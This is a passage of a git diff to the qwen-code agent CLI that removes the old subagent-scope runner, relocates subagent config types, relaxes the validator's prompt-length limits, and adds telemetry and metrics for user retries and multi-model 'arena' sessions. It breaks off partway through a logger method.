ToolCallConfirmationDetails['onConfirm'] - >[1], - ) => { - if (responded.has(waiting.request.callId)) return; - responded.add(waiting.request.callId); - await waiting.confirmationDetails.onConfirm(outcome, payload); - }, - timestamp: Date.now(), - }); - } catch { - // ignore UI event emission failures - } - - // UI now renders inline confirmation via task tool live output. - } - }, - getPreferredEditor: () => undefined, - onEditorClose: () => {}, - }); - - // Prepare requests and emit TOOL_CALL events - const requests: ToolCallRequestInfo[] = authorizedCalls.map((fc) => { - const toolName = String(fc.name || 'unknown'); - const callId = fc.id ?? `${fc.name}-${Date.now()}`; - const args = (fc.args ?? {}) as Record; - const request: ToolCallRequestInfo = { - callId, - name: toolName, - args, - isClientInitiated: true, - prompt_id: promptId, - response_id: responseId, - }; - - const description = this.getToolDescription(toolName, args); - this.eventEmitter?.emit(SubAgentEventType.TOOL_CALL, { - subagentId: this.subagentId, - round: currentRound, - callId, - name: toolName, - args, - description, - timestamp: Date.now(), - } as SubAgentToolCallEvent); - - // pre-tool hook - void this.hooks?.preToolUse?.({ - subagentId: this.subagentId, - name: this.name, - toolName, - args, - timestamp: Date.now(), - }); - - return request; - }); - - if (requests.length > 0) { - // Create a per-batch completion promise, resolve when onAllToolCallsComplete fires - const batchDone = new Promise((resolve) => { - resolveBatch = () => { - resolve(); - resolveBatch = null; - }; - }); - await scheduler.schedule(requests, abortController.signal); - await batchDone; // Wait for approvals + execution to finish - } - // If all tool calls failed, inform the model so it can re-evaluate. - if (functionCalls.length > 0 && toolResponseParts.length === 0) { - toolResponseParts.push({ - text: 'All tool calls failed. Please analyze the errors and try an alternative approach.', - }); - } - - return [{ role: 'user', parts: toolResponseParts }]; - } - - getEventEmitter() { - return this.eventEmitter; - } - - getStatistics() { - const total = this.executionStats.totalToolCalls; - const successRate = - total > 0 ? (this.executionStats.successfulToolCalls / total) * 100 : 0; - return { - ...this.executionStats, - successRate, - toolUsage: Array.from(this.toolUsage.entries()).map(([name, v]) => ({ - name, - ...v, - })), - }; - } - - getExecutionSummary(): SubagentStatsSummary { - return this.stats.getSummary(); - } - - getFinalText(): string { - return this.finalText; - } - - getTerminateMode(): SubagentTerminateMode { - return this.terminateMode; - } - - private async createChatObject(context: ContextState) { - if (!this.promptConfig.systemPrompt && !this.promptConfig.initialMessages) { - throw new Error( - 'PromptConfig must have either `systemPrompt` or `initialMessages` defined.', - ); - } - if (this.promptConfig.systemPrompt && this.promptConfig.initialMessages) { - throw new Error( - 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', - ); - } - - const envHistory = await getInitialChatHistory(this.runtimeContext); - - const start_history = [ - ...envHistory, - ...(this.promptConfig.initialMessages ?? []), - ]; - - const systemInstruction = this.promptConfig.systemPrompt - ? this.buildChatSystemPrompt(context) - : undefined; - - try { - const generationConfig: GenerateContentConfig & { - systemInstruction?: string | Content; - } = { - temperature: this.modelConfig.temp, - topP: this.modelConfig.top_p, - }; - - if (systemInstruction) { - generationConfig.systemInstruction = systemInstruction; - } - - return new GeminiChat( - this.runtimeContext, - generationConfig, - start_history, - ); - } catch (error) { - await reportError( - error, - 'Error initializing chat session.', - start_history, - 'startChat', - ); - // The calling function will handle the undefined return. - return undefined; - } - } - - /** - * Safely retrieves the description of a tool by attempting to build it. - * Returns an empty string if any error occurs during the process. - * - * @param toolName The name of the tool to get description for. - * @param args The arguments that would be passed to the tool. - * @returns The tool description or empty string if error occurs. - */ - private getToolDescription( - toolName: string, - args: Record, - ): string { - try { - const toolRegistry = this.runtimeContext.getToolRegistry(); - const tool = toolRegistry.getTool(toolName); - if (!tool) { - return ''; - } - - const toolInstance = tool.build(args); - return toolInstance.getDescription() || ''; - } catch { - // Safely ignore all runtime errors and return empty string - return ''; - } - } - - /** - * Records tool call statistics for both successful and failed tool calls. - * This includes updating aggregate stats, per-tool usage, and the statistics service. - */ - private recordToolCallStats( - toolName: string, - success: boolean, - durationMs: number, - errorMessage?: string, - ): void { - // Update aggregate stats - this.executionStats.totalToolCalls += 1; - if (success) { - this.executionStats.successfulToolCalls += 1; - } else { - this.executionStats.failedToolCalls += 1; - } - - // Per-tool usage - const tu = this.toolUsage.get(toolName) || { - count: 0, - success: 0, - failure: 0, - totalDurationMs: 0, - averageDurationMs: 0, - }; - tu.count += 1; - if (success) { - tu.success += 1; - } else { - tu.failure += 1; - tu.lastError = errorMessage || 'Unknown error'; - } - tu.totalDurationMs = (tu.totalDurationMs || 0) + durationMs; - tu.averageDurationMs = tu.count > 0 ? tu.totalDurationMs / tu.count : 0; - this.toolUsage.set(toolName, tu); - - // Update statistics service - this.stats.recordToolCall( - toolName, - success, - durationMs, - this.toolUsage.get(toolName)?.lastError, - ); - } - - private buildChatSystemPrompt(context: ContextState): string { - if (!this.promptConfig.systemPrompt) { - // This should ideally be caught in createChatObject, but serves as a safeguard. - return ''; - } - - let finalPrompt = templateString(this.promptConfig.systemPrompt, context); - - // Add general non-interactive instructions. - finalPrompt += ` - -Important Rules: - - You operate in non-interactive mode: do not ask the user questions; proceed with available context. - - Use tools only when necessary to obtain facts or make changes. - - When the task is complete, return the final result as a normal model response (not a tool call) and stop.`; - - // Append user memory (QWEN.md + output-language.md) to ensure subagent respects project conventions - const userMemory = this.runtimeContext.getUserMemory(); - if (userMemory && userMemory.trim().length > 0) { - finalPrompt += `\n\n---\n\n${userMemory.trim()}`; - } - - return finalPrompt; - } -} diff --git a/packages/core/src/subagents/types.ts b/packages/core/src/subagents/types.ts index efa73a7e4..55e57f61e 100644 --- a/packages/core/src/subagents/types.ts +++ b/packages/core/src/subagents/types.ts @@ -4,7 +4,19 @@ * SPDX-License-Identifier: Apache-2.0 */ -import type { Content, FunctionDeclaration } from '@google/genai'; +/** + * @fileoverview Subagent configuration types. + * + * Agent runtime types (PromptConfig, ModelConfig, RunConfig, ToolConfig, + * AgentTerminateMode) are canonically defined in agents/runtime/agent-types.ts. + */ + +import type { + ModelConfig, + RunConfig, + PromptConfig, + ToolConfig, +} from '../agents/runtime/agent-types.js'; /** * Represents the storage level for a subagent configuration. @@ -24,7 +36,7 @@ export type SubagentLevel = /** * Core configuration for a subagent as stored in Markdown files. * This interface represents the file-based configuration that gets - * converted to runtime configuration for SubAgentScope. + * converted to runtime configuration for AgentHeadless. */ export interface SubagentConfig { /** Unique name identifier for the subagent */ @@ -82,20 +94,20 @@ export interface SubagentConfig { } /** - * Runtime configuration that converts file-based config to existing SubAgentScope. + * Runtime configuration that converts file-based config to AgentHeadless. * This interface maps SubagentConfig to the existing runtime interfaces. */ export interface SubagentRuntimeConfig { - /** Prompt configuration for SubAgentScope */ + /** Prompt configuration for AgentHeadless */ promptConfig: PromptConfig; - /** Model configuration for SubAgentScope */ + /** Model configuration for AgentHeadless */ modelConfig: ModelConfig; - /** Runtime execution configuration for SubAgentScope */ + /** Runtime execution configuration for AgentHeadless */ runConfig: RunConfig; - /** Optional tool configuration for SubAgentScope */ + /** Optional tool configuration for AgentHeadless */ toolConfig?: ToolConfig; } @@ -176,97 +188,3 @@ export const SubagentErrorCode = { export type SubagentErrorCode = (typeof SubagentErrorCode)[keyof typeof SubagentErrorCode]; - -/** - * Describes the possible termination modes for a subagent. - * This enum provides a clear indication of why a subagent's execution might have ended. - */ -export enum SubagentTerminateMode { - /** - * Indicates that the subagent's execution terminated due to an unrecoverable error. - */ - ERROR = 'ERROR', - /** - * Indicates that the subagent's execution terminated because it exceeded the maximum allowed working time. - */ - TIMEOUT = 'TIMEOUT', - /** - * Indicates that the subagent's execution successfully completed all its defined goals. - */ - GOAL = 'GOAL', - /** - * Indicates that the subagent's execution terminated because it exceeded the maximum number of turns. - */ - MAX_TURNS = 'MAX_TURNS', - /** - * Indicates that the subagent's execution was cancelled via an abort signal. - */ - CANCELLED = 'CANCELLED', -} - -/** - * Configures the initial prompt for the subagent. - */ -export interface PromptConfig { - /** - * A single system prompt string that defines the subagent's persona and instructions. - * Note: You should use either `systemPrompt` or `initialMessages`, but not both. - */ - systemPrompt?: string; - - /** - * An array of user/model content pairs to seed the chat history for few-shot prompting. - * Note: You should use either `systemPrompt` or `initialMessages`, but not both. - */ - initialMessages?: Content[]; -} - -/** - * Configures the tools available to the subagent during its execution. - */ -export interface ToolConfig { - /** - * A list of tool names (from the tool registry) or full function declarations - * that the subagent is permitted to use. - */ - tools: Array; -} - -/** - * Configures the generative model parameters for the subagent. - * This interface specifies the model to be used and its associated generation settings, - * such as temperature and top-p values, which influence the creativity and diversity of the model's output. - */ -export interface ModelConfig { - /** - * The name or identifier of the model to be used (e.g., 'qwen3-coder-plus'). - * - * TODO: In the future, this needs to support 'auto' or some other string to support routing use cases. - */ - model?: string; - /** - * The temperature for the model's sampling process. - */ - temp?: number; - /** - * The top-p value for nucleus sampling. - */ - top_p?: number; -} - -/** - * Configures the execution environment and constraints for the subagent. - * This interface defines parameters that control the subagent's runtime behavior, - * such as maximum execution time, to prevent infinite loops or excessive resource consumption. - * - * TODO: Consider adding max_tokens as a form of budgeting. - */ -export interface RunConfig { - /** The maximum execution time for the subagent in minutes. */ - max_time_minutes?: number; - /** - * The maximum number of conversational turns (a user message + model response) - * before the execution is terminated. Helps prevent infinite loops. - */ - max_turns?: number; -} diff --git a/packages/core/src/subagents/validation.test.ts b/packages/core/src/subagents/validation.test.ts index 26819845d..1d705cc0d 100644 --- a/packages/core/src/subagents/validation.test.ts +++ b/packages/core/src/subagents/validation.test.ts @@ -164,21 +164,12 @@ describe('SubagentValidator', () => { ); }); - it('should reject prompts that are too long', () => { - const longPrompt = 'a'.repeat(10001); - const result = validator.validateSystemPrompt(longPrompt); - expect(result.isValid).toBe(false); - expect(result.errors).toContain( - 'System prompt is too long (>10,000 characters)', - ); - }); - it('should warn about long prompts', () => { - const longPrompt = 'a'.repeat(5001); + const longPrompt = 'a'.repeat(10001); const result = validator.validateSystemPrompt(longPrompt); expect(result.isValid).toBe(true); expect(result.warnings).toContain( - 'System prompt is quite long (>5,000 characters), consider shortening', + 'System prompt is quite long (>10,000 characters), consider shortening', ); }); }); @@ -372,7 +363,7 @@ describe('SubagentValidator', () => { const configWithWarnings: SubagentConfig = { ...validConfig, name: 'TestAgent', // Will generate warning about case - description: 'A'.repeat(501), // Will generate warning about long description + description: 'A'.repeat(1001), // Will generate warning about long description }; const result = validator.validateConfig(configWithWarnings); diff --git a/packages/core/src/subagents/validation.ts b/packages/core/src/subagents/validation.ts index 5df8cc315..15fb31269 100644 --- a/packages/core/src/subagents/validation.ts +++ b/packages/core/src/subagents/validation.ts @@ -5,12 +5,8 @@ */ import { SubagentError, SubagentErrorCode } from './types.js'; -import type { - ModelConfig, - RunConfig, - SubagentConfig, - ValidationResult, -} from './types.js'; +import type { SubagentConfig, ValidationResult } from './types.js'; +import type { ModelConfig, RunConfig } from '../agents/runtime/agent-types.js'; /** * Validates subagent configurations to ensure they are well-formed @@ -36,9 +32,9 @@ export class SubagentValidator { // Validate description if (!config.description || config.description.trim().length === 0) { errors.push('Description is required and cannot be empty'); - } else if (config.description.length > 500) { + } else if (config.description.length > 1000) { warnings.push( - 'Description is quite long (>500 chars), consider shortening for better readability', + 'Description is quite long (>1,000 chars), consider shortening for better readability', ); } @@ -181,12 +177,10 @@ export class SubagentValidator { errors.push('System prompt must be at least 10 characters long'); } - // Check maximum length to prevent token issues + // Warn for very long prompts if (trimmedPrompt.length > 10000) { - errors.push('System prompt is too long (>10,000 characters)'); - } else if (trimmedPrompt.length > 5000) { warnings.push( - 'System prompt is quite long (>5,000 characters), consider shortening', + 'System prompt is quite long (>10,000 characters), consider shortening', ); } diff --git a/packages/core/src/telemetry/constants.ts b/packages/core/src/telemetry/constants.ts index cea2188eb..6de60015b 100644 --- a/packages/core/src/telemetry/constants.ts +++ b/packages/core/src/telemetry/constants.ts @@ -7,6 +7,7 @@ export const SERVICE_NAME = 'qwen-code'; export const EVENT_USER_PROMPT = 'qwen-code.user_prompt'; +export const EVENT_USER_RETRY = 'qwen-code.user_retry'; export const EVENT_TOOL_CALL = 'qwen-code.tool_call'; export const EVENT_API_REQUEST = 'qwen-code.api_request'; export const EVENT_API_ERROR = 'qwen-code.api_error'; @@ -38,6 +39,11 @@ export const EVENT_SKILL_LAUNCH = 'qwen-code.skill_launch'; export const EVENT_AUTH = 'qwen-code.auth'; export const EVENT_USER_FEEDBACK = 'qwen-code.user_feedback'; +// Arena Events +export const EVENT_ARENA_SESSION_STARTED = 'qwen-code.arena_session_started'; +export const EVENT_ARENA_AGENT_COMPLETED = 'qwen-code.arena_agent_completed'; +export const EVENT_ARENA_SESSION_ENDED = 'qwen-code.arena_session_ended'; + // Performance Events export const EVENT_STARTUP_PERFORMANCE = 'qwen-code.startup.performance'; export const EVENT_MEMORY_USAGE = 'qwen-code.memory.usage'; diff --git a/packages/core/src/telemetry/index.ts b/packages/core/src/telemetry/index.ts index 0f5981ed4..596db3fa1 100644 --- a/packages/core/src/telemetry/index.ts +++ b/packages/core/src/telemetry/index.ts @@ -27,6 +27,7 @@ export { export { logStartSession, logUserPrompt, + logUserRetry, logToolCall, logApiRequest, logApiError, @@ -48,12 +49,16 @@ export { logAuth, logSkillLaunch, logUserFeedback, + logArenaSessionStarted, + logArenaAgentCompleted, + logArenaSessionEnded, } from './loggers.js'; export type { SlashCommandEvent, ChatCompressionEvent } from './types.js'; export { SlashCommandStatus, EndSessionEvent, UserPromptEvent, + UserRetryEvent, ApiRequestEvent, ApiErrorEvent, ApiResponseEvent, @@ -70,8 +75,18 @@ export { SkillLaunchEvent, UserFeedbackEvent, UserFeedbackRating, + makeArenaSessionStartedEvent, + makeArenaAgentCompletedEvent, + makeArenaSessionEndedEvent, } from './types.js'; export { makeSlashCommandEvent, makeChatCompressionEvent } from './types.js'; +export type { + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, + ArenaSessionEndedStatus, + ArenaAgentCompletedStatus, +} from './types.js'; export type { TelemetryEvent } from './types.js'; export { SpanStatusCode, ValueType } from '@opentelemetry/api'; export { SemanticAttributes } from '@opentelemetry/semantic-conventions'; @@ -98,6 +113,10 @@ export { recordPerformanceRegression, recordBaselineComparison, isPerformanceMonitoringActive, + // Arena metrics functions + recordArenaSessionStartedMetrics, + recordArenaAgentCompletedMetrics, + recordArenaSessionEndedMetrics, // Performance monitoring types PerformanceMetricType, MemoryMetricType, diff --git a/packages/core/src/telemetry/loggers.test.ts b/packages/core/src/telemetry/loggers.test.ts index ab026304a..34d142c4f 100644 --- a/packages/core/src/telemetry/loggers.test.ts +++ b/packages/core/src/telemetry/loggers.test.ts @@ -148,15 +148,11 @@ describe('loggers', () => { const mockConfig = { getSessionId: () => 'test-session-id', getModel: () => 'test-model', - getEmbeddingModel: () => 'test-embedding-model', getSandbox: () => true, getCoreTools: () => ['ls', 'read-file'], getApprovalMode: () => 'default', - getContentGeneratorConfig: () => ({ - model: 'test-model', - apiKey: 'test-api-key', - authType: AuthType.USE_VERTEX_AI, - }), + getTruncateToolOutputThreshold: () => 25000, + getTruncateToolOutputLines: () => 1000, getTelemetryEnabled: () => true, getUsageStatisticsEnabled: () => true, getTelemetryLogPromptsEnabled: () => true, @@ -174,6 +170,9 @@ describe('loggers', () => { getOutputFormat: () => OutputFormat.JSON, getToolRegistry: () => undefined, getChatRecordingService: () => undefined, + getHookSystem: () => undefined, + getIdeMode: () => false, + getShouldUseNodePtyShell: () => true, } as unknown as Config; const startSessionEvent = new StartSessionEvent(mockConfig); @@ -186,19 +185,20 @@ describe('loggers', () => { 'event.name': EVENT_CLI_CONFIG, 'event.timestamp': '2025-01-01T00:00:00.000Z', model: 'test-model', - embedding_model: 'test-embedding-model', sandbox_enabled: true, core_tools_enabled: 'ls,read-file', approval_mode: 'default', - api_key_enabled: true, - vertex_ai_enabled: true, - log_user_prompts_enabled: true, + truncate_tool_output_threshold: 25000, + truncate_tool_output_lines: 1000, file_filtering_respect_git_ignore: true, debug_mode: true, mcp_servers: 'test-server', mcp_servers_count: 1, mcp_tools: undefined, mcp_tools_count: undefined, + hooks: undefined, + ide_enabled: false, + interactive_shell_enabled: true, output_format: 'json', skills: undefined, subagents: undefined, diff --git a/packages/core/src/telemetry/loggers.ts b/packages/core/src/telemetry/loggers.ts index d15d1bcb7..0a7842f38 100644 --- a/packages/core/src/telemetry/loggers.ts +++ b/packages/core/src/telemetry/loggers.ts @@ -20,6 +20,7 @@ import { EVENT_IDE_CONNECTION, EVENT_TOOL_CALL, EVENT_USER_PROMPT, + EVENT_USER_RETRY, EVENT_FLASH_FALLBACK, EVENT_NEXT_SPEAKER_CHECK, SERVICE_NAME, @@ -40,6 +41,9 @@ import { EVENT_SKILL_LAUNCH, EVENT_EXTENSION_UPDATE, EVENT_USER_FEEDBACK, + EVENT_ARENA_SESSION_STARTED, + EVENT_ARENA_AGENT_COMPLETED, + EVENT_ARENA_SESSION_ENDED, } from './constants.js'; import { recordApiErrorMetrics, @@ -53,6 +57,9 @@ import { recordSubagentExecutionMetrics, recordTokenUsageMetrics, recordToolCallMetrics, + recordArenaSessionStartedMetrics, + recordArenaAgentCompletedMetrics, + recordArenaSessionEndedMetrics, } from './metrics.js'; import { QwenLogger } from './qwen-logger/qwen-logger.js'; import { isTelemetrySdkInitialized } from './sdk.js'; @@ -66,6 +73,7 @@ import type { StartSessionEvent, ToolCallEvent, UserPromptEvent, + UserRetryEvent, FlashFallbackEvent, NextSpeakerCheckEvent, LoopDetectedEvent, @@ -90,6 +98,9 @@ import type { AuthEvent, SkillLaunchEvent, UserFeedbackEvent, + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, } from './types.js'; import type { UiEvent } from './uiTelemetry.js'; import { uiTelemetryService } from './uiTelemetry.js'; @@ -115,19 +126,20 @@ export function logStartSession( 'event.name': EVENT_CLI_CONFIG, 'event.timestamp': new Date().toISOString(), model: event.model, - embedding_model: event.embedding_model, sandbox_enabled: event.sandbox_enabled, core_tools_enabled: event.core_tools_enabled, approval_mode: event.approval_mode, - api_key_enabled: event.api_key_enabled, - vertex_ai_enabled: event.vertex_ai_enabled, - log_user_prompts_enabled: event.telemetry_log_user_prompts_enabled, file_filtering_respect_git_ignore: event.file_filtering_respect_git_ignore, debug_mode: event.debug_enabled, + truncate_tool_output_threshold: event.truncate_tool_output_threshold, + truncate_tool_output_lines: event.truncate_tool_output_lines, mcp_servers: event.mcp_servers, mcp_servers_count: event.mcp_servers_count, mcp_tools: event.mcp_tools, mcp_tools_count: event.mcp_tools_count, + hooks: event.hooks, + ide_enabled: event.ide_enabled, + interactive_shell_enabled: event.interactive_shell_enabled, output_format: event.output_format, skills: event.skills, subagents: event.subagents, @@ -169,6 +181,25 @@ export function logUserPrompt(config: Config, event: UserPromptEvent): void { logger.emit(logRecord); } +export function logUserRetry(config: Config, event: UserRetryEvent): void { + QwenLogger.getInstance(config)?.logRetryEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + 'event.name': EVENT_USER_RETRY, + 'event.timestamp': new Date().toISOString(), + prompt_id: event.prompt_id, + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `User retry.`, + attributes, + }; + logger.emit(logRecord); +} + export function logToolCall(config: Config, event: ToolCallEvent): void { const uiEvent = { ...event, @@ -353,7 +384,7 @@ export function logApiError(config: Config, event: ApiErrorEvent): void { ...event, 'event.name': EVENT_API_ERROR, 'event.timestamp': new Date().toISOString(), - ['error.message']: event.error, + ['error.message']: event.error_message, model_name: event.model, duration: event.duration_ms, }; @@ -367,7 +398,7 @@ export function logApiError(config: Config, event: ApiErrorEvent): void { const logger = logs.getLogger(SERVICE_NAME); const logRecord: LogRecord = { - body: `API error for ${event.model}. Error: ${event.error}. Duration: ${event.duration_ms}ms.`, + body: `API error for ${event.model}. Error: ${event.error_message}. Duration: ${event.duration_ms}ms.`, attributes, }; logger.emit(logRecord); @@ -946,3 +977,86 @@ export function logUserFeedback( }; logger.emit(logRecord); } + +export function logArenaSessionStarted( + config: Config, + event: ArenaSessionStartedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaSessionStartedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + model_ids: JSON.stringify(event.model_ids), + 'event.name': EVENT_ARENA_SESSION_STARTED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena session started. Agents: ${event.model_ids.length}.`, + attributes, + }; + logger.emit(logRecord); + recordArenaSessionStartedMetrics(config); +} + +export function logArenaAgentCompleted( + config: Config, + event: ArenaAgentCompletedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaAgentCompletedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + 'event.name': EVENT_ARENA_AGENT_COMPLETED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena agent ${event.agent_model_id} ${event.status}. Duration: ${event.duration_ms}ms. Tokens: ${event.total_tokens}.`, + attributes, + }; + logger.emit(logRecord); + recordArenaAgentCompletedMetrics( + config, + event.agent_model_id, + event.status, + event.duration_ms, + event.input_tokens, + event.output_tokens, + ); +} + +export function logArenaSessionEnded( + config: Config, + event: ArenaSessionEndedEvent, +): void { + QwenLogger.getInstance(config)?.logArenaSessionEndedEvent(event); + if (!isTelemetrySdkInitialized()) return; + + const attributes: LogAttributes = { + ...getCommonAttributes(config), + ...event, + 'event.name': EVENT_ARENA_SESSION_ENDED, + 'event.timestamp': new Date().toISOString(), + }; + + const logger = logs.getLogger(SERVICE_NAME); + const logRecord: LogRecord = { + body: `Arena session ended: ${event.status}.${event.winner_model_id ? ` Winner: ${event.winner_model_id}.` : ''}`, + attributes, + }; + logger.emit(logRecord); + recordArenaSessionEndedMetrics( + config, + event.status, + event.display_backend, + event.duration_ms, + event.winner_model_id, + ); +} diff --git a/packages/core/src/telemetry/metrics.ts b/packages/core/src/telemetry/metrics.ts index 0ab499e0f..f71498c36 100644 --- a/packages/core/src/telemetry/metrics.ts +++ b/packages/core/src/telemetry/metrics.ts @@ -23,6 +23,14 @@ const CONTENT_RETRY_FAILURE_COUNT = `${SERVICE_NAME}.chat.content_retry_failure. const MODEL_SLASH_COMMAND_CALL_COUNT = `${SERVICE_NAME}.slash_command.model.call_count`; export const SUBAGENT_EXECUTION_COUNT = `${SERVICE_NAME}.subagent.execution.count`; +// Arena Metrics +const ARENA_SESSION_COUNT = `${SERVICE_NAME}.arena.session.count`; +const ARENA_SESSION_DURATION = `${SERVICE_NAME}.arena.session.duration`; +const ARENA_AGENT_COUNT = `${SERVICE_NAME}.arena.agent.count`; +const ARENA_AGENT_DURATION = `${SERVICE_NAME}.arena.agent.duration`; +const ARENA_AGENT_TOKENS = `${SERVICE_NAME}.arena.agent.tokens`; +const ARENA_RESULT_SELECTED = `${SERVICE_NAME}.arena.result.selected`; + // Performance Monitoring Metrics const STARTUP_TIME = `${SERVICE_NAME}.startup.duration`; const MEMORY_USAGE = `${SERVICE_NAME}.memory.usage`; @@ -345,6 +353,14 @@ let performanceScoreGauge: Histogram | undefined; let regressionDetectionCounter: Counter | undefined; let regressionPercentageChangeHistogram: Histogram | undefined; let baselineComparisonHistogram: Histogram | undefined; +// Arena Metrics +let arenaSessionCounter: Counter | undefined; +let arenaSessionDurationHistogram: Histogram | undefined; +let arenaAgentCounter: Counter | undefined; +let arenaAgentDurationHistogram: Histogram | undefined; +let arenaAgentTokensCounter: Counter | undefined; +let arenaResultSelectedCounter: Counter | undefined; + let isMetricsInitialized = false; let isPerformanceMonitoringEnabled = false; @@ -373,6 +389,37 @@ export function initializeMetrics(config: Config): void { valueType: ValueType.INT, }); + // Arena metrics + arenaSessionCounter = meter.createCounter(ARENA_SESSION_COUNT, { + description: 'Counts arena sessions by status and display backend.', + valueType: ValueType.INT, + }); + arenaSessionDurationHistogram = meter.createHistogram( + ARENA_SESSION_DURATION, + { + description: 'Duration of arena sessions in milliseconds.', + unit: 'ms', + valueType: ValueType.INT, + }, + ); + arenaAgentCounter = meter.createCounter(ARENA_AGENT_COUNT, { + description: 'Counts arena agent completions by status and model.', + valueType: ValueType.INT, + }); + arenaAgentDurationHistogram = meter.createHistogram(ARENA_AGENT_DURATION, { + description: 'Duration of arena agent execution in milliseconds.', + unit: 'ms', + valueType: ValueType.INT, + }); + arenaAgentTokensCounter = meter.createCounter(ARENA_AGENT_TOKENS, { + description: 'Token usage by arena agents.', + valueType: ValueType.INT, + }); + arenaResultSelectedCounter = meter.createCounter(ARENA_RESULT_SELECTED, { + description: 'Counts arena result selections by model.', + valueType: ValueType.INT, + }); + Object.entries(HISTOGRAM_DEFINITIONS).forEach( ([name, { description, unit, valueType, assign }]) => { assign(meter.createHistogram(name, { description, unit, valueType })); @@ -747,3 +794,85 @@ export function recordSubagentExecutionMetrics( subagentExecutionCounter.add(1, attributes); } + +// ─── Arena Metric Recording Functions ─────────────────────────── + +export function recordArenaSessionStartedMetrics(config: Config): void { + if (!isMetricsInitialized) return; + arenaSessionCounter?.add(1, { + ...baseMetricDefinition.getCommonAttributes(config), + status: 'started', + }); +} + +export function recordArenaAgentCompletedMetrics( + config: Config, + modelId: string, + status: string, + durationMs: number, + inputTokens: number, + outputTokens: number, +): void { + if (!isMetricsInitialized) return; + + const common = baseMetricDefinition.getCommonAttributes(config); + + arenaAgentCounter?.add(1, { + ...common, + status, + model_id: modelId, + }); + + arenaAgentDurationHistogram?.record(durationMs, { + ...common, + model_id: modelId, + }); + + if (inputTokens > 0) { + arenaAgentTokensCounter?.add(inputTokens, { + ...common, + model_id: modelId, + type: 'input', + }); + } + + if (outputTokens > 0) { + arenaAgentTokensCounter?.add(outputTokens, { + ...common, + model_id: modelId, + type: 'output', + }); + } +} + +export function recordArenaSessionEndedMetrics( + config: Config, + status: string, + displayBackend?: string, + durationMs?: number, + winnerModelId?: string, +): void { + if (!isMetricsInitialized) return; + + const common = baseMetricDefinition.getCommonAttributes(config); + + arenaSessionCounter?.add(1, { + ...common, + status, + ...(displayBackend ? { display_backend: displayBackend } : {}), + }); + + if (durationMs !== undefined && arenaSessionDurationHistogram) { + arenaSessionDurationHistogram.record(durationMs, { + ...common, + status, + }); + } + + if (winnerModelId) { + arenaResultSelectedCounter?.add(1, { + ...common, + model_id: winnerModelId, + }); + } +} diff --git a/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts b/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts index 6cc0f230a..352d90e12 100644 --- a/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts +++ b/packages/core/src/telemetry/qwen-logger/qwen-logger.test.ts @@ -81,6 +81,11 @@ const makeFakeConfig = (overrides: Partial = {}): Config => { getFileFilteringRespectGitIgnore: () => true, getOutputFormat: () => 'text', getToolRegistry: () => undefined, + getTruncateToolOutputThreshold: () => 25000, + getTruncateToolOutputLines: () => 0, + getIdeMode: () => false, + getShouldUseNodePtyShell: () => false, + getHookSystem: () => undefined, ...overrides, }; return defaults as Config; diff --git a/packages/core/src/telemetry/qwen-logger/qwen-logger.ts b/packages/core/src/telemetry/qwen-logger/qwen-logger.ts index 6d30e13e1..b0bb22bb0 100644 --- a/packages/core/src/telemetry/qwen-logger/qwen-logger.ts +++ b/packages/core/src/telemetry/qwen-logger/qwen-logger.ts @@ -42,9 +42,13 @@ import type { AuthEvent, SkillLaunchEvent, UserFeedbackEvent, + UserRetryEvent, RipgrepFallbackEvent, EndSessionEvent, ExtensionUpdateEvent, + ArenaSessionStartedEvent, + ArenaAgentCompletedEvent, + ArenaSessionEndedEvent, } from '../types.js'; import type { RumEvent, @@ -415,20 +419,20 @@ export class QwenLogger { const applicationEvent = this.createViewEvent('session', 'session_start', { properties: { - model: event.model, approval_mode: event.approval_mode, - embedding_model: event.embedding_model, - sandbox_enabled: event.sandbox_enabled, core_tools_enabled: event.core_tools_enabled, - api_key_enabled: event.api_key_enabled, - vertex_ai_enabled: event.vertex_ai_enabled, debug_enabled: event.debug_enabled, + hooks: event.hooks, + ide_enabled: event.ide_enabled, + interactive_shell_enabled: event.interactive_shell_enabled, mcp_servers: event.mcp_servers, - telemetry_enabled: event.telemetry_enabled, - telemetry_log_user_prompts_enabled: - event.telemetry_log_user_prompts_enabled, + model: event.model, + sandbox_enabled: event.sandbox_enabled, skills: event.skills, subagents: event.subagents, + telemetry_enabled: event.telemetry_enabled, + truncate_tool_output_lines: event.truncate_tool_output_lines, + truncate_tool_output_threshold: event.truncate_tool_output_threshold, }, }); @@ -465,7 +469,6 @@ export class QwenLogger { logNewPromptEvent(event: UserPromptEvent): void { const rumEvent = this.createActionEvent('user', 'new_prompt', { properties: { - auth_type: event.auth_type, prompt_id: event.prompt_id, prompt_length: event.prompt_length, }, @@ -475,6 +478,17 @@ export class QwenLogger { this.flushIfNeeded(); } + logRetryEvent(event: UserRetryEvent): void { + const rumEvent = this.createActionEvent('user', 'retry', { + properties: { + prompt_id: event.prompt_id, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + logSlashCommandEvent(event: SlashCommandEvent): void { const rumEvent = this.createActionEvent('user', 'slash_command', { properties: { @@ -631,12 +645,13 @@ export class QwenLogger { status_code: event.status_code?.toString() ?? '', duration: event.duration_ms, success: 0, - message: event.error, + message: event.error_message, trace_id: event.response_id, properties: { auth_type: event.auth_type, model: event.model, prompt_id: event.prompt_id, + error_message: event.error_message, error_type: event.error_type, }, }); @@ -925,6 +940,61 @@ export class QwenLogger { this.flushIfNeeded(); } + // arena events + logArenaSessionStartedEvent(event: 